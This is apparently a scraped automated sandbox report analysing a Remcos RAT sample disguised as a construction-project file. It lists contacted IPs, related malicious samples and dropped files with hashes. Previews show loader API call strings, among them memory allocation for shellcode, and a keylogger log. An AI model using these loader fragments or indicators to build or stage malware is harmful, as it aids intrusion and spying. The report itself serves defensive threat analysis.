                                                                                https://aefd.nelreports.net/api/report?cat=bingaotbhv4333.tmp.5.drfalse
                                                                                  		high
                                                                                  https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-aebhv4333.tmp.5.drfalse
                                                                                    		high
                                                                                    https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7bhv4333.tmp.5.drfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFDbhv4333.tmp.5.drfalse
                                                                                      		high
                                                                                      https://aefd.nelreports.net/api/report?cat=bingrmsbhv4333.tmp.5.drfalse
                                                                                        		high
                                                                                        https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993bhv4333.tmp.5.drfalse
                                                                                          		high
                                                                                          https://www.google.com/accounts/serviceloginRef GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exefalse
                                                                                            		high
                                                                                            https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5bhv4333.tmp.5.drfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3bhv4333.tmp.5.drfalse
                                                                                              		high
                                                                                              https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135bhv4333.tmp.5.drfalse
                                                                                                		high
                                                                                                https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59bhv4333.tmp.5.drfalse
                                                                                                  		high
                                                                                                  http://www.ebuddy.comRef GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000007.00000002.2205246174.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                    		high

                                                                                                    World Map of Contacted IPs

                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs

                                                                                                    Public IPs

                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                    66.63.187.30
                                                                                                    		unknownUnited States
                                                                                                    		8100ASN-QUADRANET-GLOBALUSfalse
                                                                                                    178.237.33.50
                                                                                                    		geoplugin.netNetherlands
                                                                                                    		8455ATOM86-ASATOM86NLfalse
                                                                                                    162.251.122.87
                                                                                                    		unknownCanada
                                                                                                    		64236UNREAL-SERVERSUStrue

                                                                                                    General Information

                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                    Analysis ID:1576192
                                                                                                    Start date and time:2024-12-16 16:17:08 +01:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 7m 32s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                    Number of analysed new started processes analysed:9
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:0
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Sample name:Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                    Detection:MAL
                                                                                                    Classification:mal100.phis.troj.spyw.evad.winEXE@9/18@1/3
                                                                                                    EGA Information:
                                                                                                    • Successful, ratio: 100%
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 97%
                                                                                                    • Number of executed functions: 180
                                                                                                    • Number of non-executed functions: 316
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .exe

                                                                                                    Warnings

                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                    • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                    • VT rate limit hit for: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe

                                                                                                    Simulations

                                                                                                    Behavior and APIs

                                                                                                    TimeTypeDescription
                                                                                                    10:19:20API Interceptor522064x Sleep call for process: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe modified

                                                                                                    Joe Sandbox View / Context

                                                                                                    IPs

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    66.63.187.30Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                    • 66.63.187.30/hpVMAPRZVuaX36.bin
                                                                                                    178.237.33.50Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                    • geoplugin.net/json.gp
                                                                                                    givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                    • geoplugin.net/json.gp
                                                                                                    clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                    • geoplugin.net/json.gp
                                                                                                    7Sbq4gMMlp.exeGet hashmaliciousRemcosBrowse
                                                                                                    • geoplugin.net/json.gp
                                                                                                    PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                                                                    • geoplugin.net/json.gp
                                                                                                    requests-pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                    • geoplugin.net/json.gp
                                                                                                    Documents.pdfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                    • geoplugin.net/json.gp
                                                                                                    x295IO8kqM.exeGet hashmaliciousRemcosBrowse
                                                                                                    • geoplugin.net/json.gp
                                                                                                    7d74ApV4bb.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                    • geoplugin.net/json.gp
                                                                                                    greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                    • geoplugin.net/json.gp

                                                                                                    Domains

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    geoplugin.netPurchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                    • 178.237.33.50
                                                                                                    givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    7Sbq4gMMlp.exeGet hashmaliciousRemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    requests-pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    Documents.pdfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                    • 178.237.33.50
                                                                                                    x295IO8kqM.exeGet hashmaliciousRemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    7d74ApV4bb.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                    • 178.237.33.50
                                                                                                    greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                    • 178.237.33.50

                                                                                                    ASNs

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    ASN-QUADRANET-GLOBALUSPurchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                    • 66.63.187.30
                                                                                                    armv4l.elfGet hashmaliciousMiraiBrowse
                                                                                                    • 204.44.218.122
                                                                                                    rebirth.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                    • 104.223.28.126
                                                                                                    jew.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 72.11.146.73
                                                                                                    2.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 173.205.82.95
                                                                                                    Josho.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                    • 185.228.81.1
                                                                                                    tQoSuhQIdC.msiGet hashmaliciousUnknownBrowse
                                                                                                    • 66.63.187.205
                                                                                                    Ref#60031796.exeGet hashmaliciousRemcosBrowse
                                                                                                    • 69.174.98.48
                                                                                                    gC0jV08bP3.exeGet hashmaliciousMeduza Stealer, PureLog Stealer, RedLine, zgRATBrowse
                                                                                                    • 66.63.187.209
                                                                                                    7xweUz2MYa.exeGet hashmaliciousMeduza Stealer, PureLog Stealer, RedLine, zgRATBrowse
                                                                                                    • 66.63.187.209
                                                                                                    ATOM86-ASATOM86NLPurchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                    • 178.237.33.50
                                                                                                    givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    7Sbq4gMMlp.exeGet hashmaliciousRemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    requests-pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    Documents.pdfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                    • 178.237.33.50
                                                                                                    x295IO8kqM.exeGet hashmaliciousRemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    7d74ApV4bb.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                    • 178.237.33.50
                                                                                                    greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                    • 178.237.33.50
                                                                                                    UNREAL-SERVERSUSPurchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                    • 162.251.122.87
                                                                                                    WO-663071 Sabiya Power Station Project.vbsGet hashmaliciousRemcosBrowse
                                                                                                    • 162.251.122.87
                                                                                                    RFQ 008191.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                    • 212.162.149.89
                                                                                                    purchase.order.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                    • 212.162.149.66
                                                                                                    Forhandlingsfriheden.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                    • 212.162.149.66
                                                                                                    order CF08093-24.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                    • 212.162.149.89
                                                                                                    PO. A-72 9234567.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                    • 212.162.149.89
                                                                                                    la.bot.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                    • 162.251.123.175
                                                                                                    file.exeGet hashmaliciousRedLineBrowse
                                                                                                    • 212.162.149.48
                                                                                                    https://haqzt.trc20.kcgrocks.com/merchantServicesGet hashmaliciousUnknownBrowse
                                                                                                    • 172.96.10.214

                                                                                                    JA3 Fingerprints

                                                                                                    No context

                                                                                                    Dropped Files

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dllPurchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                      kahyts.exeGet hashmaliciousGuLoaderBrowse
                                                                                                        kahyts.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          https://www.imobie.com/go/download.php?product=atiGet hashmaliciousUnknownBrowse
                                                                                                            Synarmogoidea.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                              Synarmogoidea.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                https://dldir1v6.qq.com/weixin/Windows/WeChatSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                  https://dldir1v6.qq.com/weixin/Windows/WeChatSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                    SecuriteInfo.com.Trojan.Encoder.17199.16872.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                      SecuriteInfo.com.Trojan.Encoder.17199.16872.exeGet hashmaliciousGuLoaderBrowse

                                                                                                                        Created / dropped Files

                                                                                                                        C:\ProgramData\remcos\logs.dat

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):144
                                                                                                                        Entropy (8bit):3.365630494294252
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:rhlKlyKIlfUlPNWLlFwb5JWRal2Jl+7R0DAlBG45klovDl6v:6lZ4UlPN1b5YcIeeDAlOWAv
                                                                                                                        MD5:A1626BEEDCEC054D5C7E3D66806D0343
                                                                                                                        SHA1:F7F79C4C30D51D11CF9407DFD56E3606B200B0C4
                                                                                                                        SHA-256:478DC169870626E5D2550644CB271E53B176C3F12B0D73E6C3FB47AA778A619A
                                                                                                                        SHA-512:1DCD0560BC582ADA4E37E3A930BFFCC2F18CE6A8B17458977F1A3C9E8EE62ABEEC2CEE7DDEF1C6379362FE0D3F43C236E569BEE54BA39EFE0EECBF3CFF0806DA
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                                        Reputation:low
                                                                                                                        Preview:....[.2.0.2.4./.1.2./.1.6. .1.0.:.1.8.:.4.8. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        File Type:JSON data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):963
                                                                                                                        Entropy (8bit):5.018384957371898
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:tkluWJmnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zz2:qlupdRNuKyGX85jvXhNlT3/7CcVKWro
                                                                                                                        MD5:C9BB4D5FD5C8A01D20EBF8334B62AE54
                                                                                                                        SHA1:D38895F4CBB44CB10B6512A19034F14A2FC40359
                                                                                                                        SHA-256:767218EC255B7E851971A77B773C0ECC59DC0B179ECA46ABCC29047EEE6216AA
                                                                                                                        SHA-512:2D412433053610C0229FB3B73A26C8FB684F0A4AB03A53D0533FDC52D4E9882C25037015ACE7D4A411214AA9FAA780A8D950A83B57B200A877E26D7890977157
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7503",. "geoplugin_longitude":"-74.0014",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                                                        C:\Users\user\AppData\Local\Temp\Settings.ini

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):52
                                                                                                                        Entropy (8bit):4.725996747697686
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:HM/xiXWR0AXQQLQIfLBJXmgxv:HHpQkIP2I
                                                                                                                        MD5:87C38DC6EF4616FF016D1CCC1A793086
                                                                                                                        SHA1:AFC6434AAAD4FB1A250AF0D167DAB718DA10B4AF
                                                                                                                        SHA-256:781C527A7A89FDBFA481BF8800E255DC1B69E47B2B68040DC39103C114E31849
                                                                                                                        SHA-512:CC8EF7D9C98FB663C79A4A00FD68344F7AA3DBA27D68B3AEF463C758A74AEBF8190C8A9532FE91BC7DB32E78FF2C48C43230F03DA226F9A9EF288324EFEBF0FE
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:[Initialize]..First=user32::EnumWindows(i r1 ,i 0)..

                                                                                                                        C:\Users\user\AppData\Local\Temp\bhv4333.tmp

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x96ddfe3e, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):20447232
                                                                                                                        Entropy (8bit):1.2830265194886015
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12288:ZRSPO9ijljKhBfvKDv2Q+555ckQB8WBbXnE:mui9PD7+
                                                                                                                        MD5:2C8CC9D898FAD9B2DCBA2B2A7A6FA65E
                                                                                                                        SHA1:665DAE429E4B4D5FA36EAF5726BFFE6020F33CF0
                                                                                                                        SHA-256:EADDC5772C4404CF0EE2DF98C16E230A8B96CB9BF75C584ABE18031354028DAF
                                                                                                                        SHA-512:41D1BF4ACCD14E95361241F55B30790DEFF0D0C362A75902C09CBE3F561AF69851328821A40AB8279525200BB590547BC80489C185BF67500EAAE1F58C308523
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:...>... ........=......J}...0...{........................"..........{)......{..h.$..........................3.s.0...{..............................................................................................c...........eJ......n........................................................................................................... ............{...................................................................................................................................................................................................{;..................................Q.W.....{....................t......{...........................#......h.$.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                        C:\Users\user\AppData\Local\Temp\nsaA38D.tmp

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):60
                                                                                                                        Entropy (8bit):4.40871867207634
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:sEMBQEJkJVEj1/F8dWxQoXUn:eFMWxvUn
                                                                                                                        MD5:DF8379D971F8775D91CD01506F558897
                                                                                                                        SHA1:E28FF2839B7CF171CE3540CB2DE64FA18DB9B12C
                                                                                                                        SHA-256:AE63DA186497C9240A3AF76E8E52198426C3492AA7DCC62E8910405EF981ECEC
                                                                                                                        SHA-512:AC091F635BC253FED0C5C9E516F4E58968033793C66B2EC3E5ED31AA42D63667D85F1661CA6FBE8CFC28AD59B07D903556987C7F79AA59610934C3D6F6F60F02
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:kernel32::VirtualAlloc(i 0,i 12447744, i 0x3000, i 0x40)p.r1

                                                                                                                        C:\Users\user\AppData\Local\Temp\nsbA563.tmp

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):56
                                                                                                                        Entropy (8bit):4.206435556800405
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:sAAEVvjsKPo84n:fLxPy
                                                                                                                        MD5:4FF83567CD3F682CB62E957F312F61A0
                                                                                                                        SHA1:5BB6B4B35E74FB335211813B25025166939DDF10
                                                                                                                        SHA-256:9A2382A1EDEDEF09EF70D6DFCEA50BE1594799E518A9F89C111875301539A2AE
                                                                                                                        SHA-512:E7FBB21A2EAEE93F4F607B77476C8605A7233CB16C0EF576FAC05235252C5A0DAB338277749A9A38BABF9163D9D582D481E2A739EBBB578BFB3B813FC36A678E
                                                                                                                        Malicious:false
                                                                                                                        Preview:kernel32::ReadFile(i r5, i r1, i 12447744,*i 0, i 0)i.r3

                                                                                                                        C:\Users\user\AppData\Local\Temp\nsk7B8F.tmp

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1620343
                                                                                                                        Entropy (8bit):3.789633774447586
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12288:cbARIcif/hP1hvP8SS7YxtlpibBzBVWDT4JxEKepP7:cQIf3NtGCCGDT4TEKeV
                                                                                                                        MD5:6A779D81AD02555D27C1CF02173790DC
                                                                                                                        SHA1:8EFF3725271A9F089592B258B9C762A7C1C6115C
                                                                                                                        SHA-256:DBBC048C6661DB3B6EB749FEE2B523613E8C9F2D977B4A37D73B7677779A200B
                                                                                                                        SHA-512:37A14F024DADE0CC9ACBD97F5D8DCA1E3A8581FFD672822B6EBA0C99B6FB79502A42F138462353AB4AF464CE46E7CB1DB1C0AC702123BDD44B964DD8C27D608C
                                                                                                                        Malicious:false
                                                                                                                        Preview:.#......,...................i...........<".......#..........................................................................................................................................................................................................................................G...Y...........O...j...............................................................................................................................g..............................................................._.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                        C:\Users\user\AppData\Local\Temp\nsm99D6.tmp

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):74
                                                                                                                        Entropy (8bit):3.9637832956585757
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:sRQE1wFEt/ijNJyI3dj2+n:aQEGiwh3D
                                                                                                                        MD5:16D513397F3C1F8334E8F3E4FC49828F
                                                                                                                        SHA1:4EE15AFCA81CA6A13AF4E38240099B730D6931F0
                                                                                                                        SHA-256:D3C781A1855C8A70F5ACA88D9E2C92AFFFA80541334731F62CAA9494AA8A0C36
                                                                                                                        SHA-512:4A350B790FDD2FE957E9AB48D5969B217AB19FC7F93F3774F1121A5F140FF9A9EAAA8FA30E06A9EF40AD776E698C2E65A05323C3ADF84271DA1716E75F5183C3
                                                                                                                        Malicious:false
                                                                                                                        Preview:kernel32::CreateFileA(m r4 , i 0x80000000, i 0, p 0, i 4, i 0x80, i 0)i.r5

                                                                                                                        C:\Users\user\AppData\Local\Temp\nsmA729.tmp

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):30
                                                                                                                        Entropy (8bit):4.256564762130954
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:DyWgLQIfLBJXmgU:mkIP25
                                                                                                                        MD5:F15BFDEBB2DF02D02C8491BDE1B4E9BD
                                                                                                                        SHA1:93BD46F57C3316C27CAD2605DDF81D6C0BDE9301
                                                                                                                        SHA-256:C87F2FF45BB530577FB8856DF1760EDAF1060AE4EE2934B17FDD21B7D116F043
                                                                                                                        SHA-512:1757ED4AE4D47D0C839511C18BE5D75796224D4A3049E2D8853650ACE2C5057C42040DE6450BF90DD4969862E9EBB420CD8A34F8DD9C970779ED2E5459E8F2F1
                                                                                                                        Malicious:false
                                                                                                                        Preview:user32::EnumWindows(i r1 ,i 0)

                                                                                                                        C:\Users\user\AppData\Local\Temp\nspA0DD.tmp

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):52
                                                                                                                        Entropy (8bit):4.0914493934217315
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:sBa99k1NoCFOn:KankVg
                                                                                                                        MD5:5D04A35D3950677049C7A0CF17E37125
                                                                                                                        SHA1:CAFDD49A953864F83D387774B39B2657A253470F
                                                                                                                        SHA-256:A9493973DD293917F3EBB932AB255F8CAC40121707548DE100D5969956BB1266
                                                                                                                        SHA-512:C7B1AFD95299C0712BDBC67F9D2714926D6EC9F71909AF615AFFC400D8D2216AB76F6AC35057088836435DE36E919507E1B25BE87B07C911083F964EB67E003B
                                                                                                                        Malicious:false
                                                                                                                        Preview:kernel32::SetFilePointer(i r5, i 1200 , i 0,i 0)i.r3

                                                                                                                        C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):11776
                                                                                                                        Entropy (8bit):5.6559337539154555
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:eo24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol6Sl:k8QIl975eXqlWBrz7YLOl6
                                                                                                                        MD5:CA332BB753B0775D5E806E236DDCEC55
                                                                                                                        SHA1:F35EF76592F20850BAEF2EBBD3C9A2CFB5AD8D8F
                                                                                                                        SHA-256:DF5AE79FA558DC7AF244EC6E53939563B966E7DBD8867E114E928678DBD56E5D
                                                                                                                        SHA-512:2DE0956A1AD58AD7086E427E89B819089F2A7F1E4133ED2A0A736ADC0614E8588EBE2D97F1B59AB8886D662AEB40E0B4838C6A65FBFC652253E3A45664A03A00
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Joe Sandbox View:
                                                                                                                        • Filename: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, Detection: malicious, Browse
                                                                                                                        • Filename: kahyts.exe, Detection: malicious, Browse
                                                                                                                        • Filename: kahyts.exe, Detection: malicious, Browse
                                                                                                                        • Filename: , Detection: malicious, Browse
                                                                                                                        • Filename: Synarmogoidea.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Synarmogoidea.exe, Detection: malicious, Browse
                                                                                                                        • Filename: , Detection: malicious, Browse
                                                                                                                        • Filename: , Detection: malicious, Browse
                                                                                                                        • Filename: SecuriteInfo.com.Trojan.Encoder.17199.16872.exe, Detection: malicious, Browse
                                                                                                                        • Filename: SecuriteInfo.com.Trojan.Encoder.17199.16872.exe, Detection: malicious, Browse
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L....\.U...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                        C:\Users\user\AppData\Local\Temp\osspeswmhebwmnhvszpvhldf

                                                                                                                        Download File
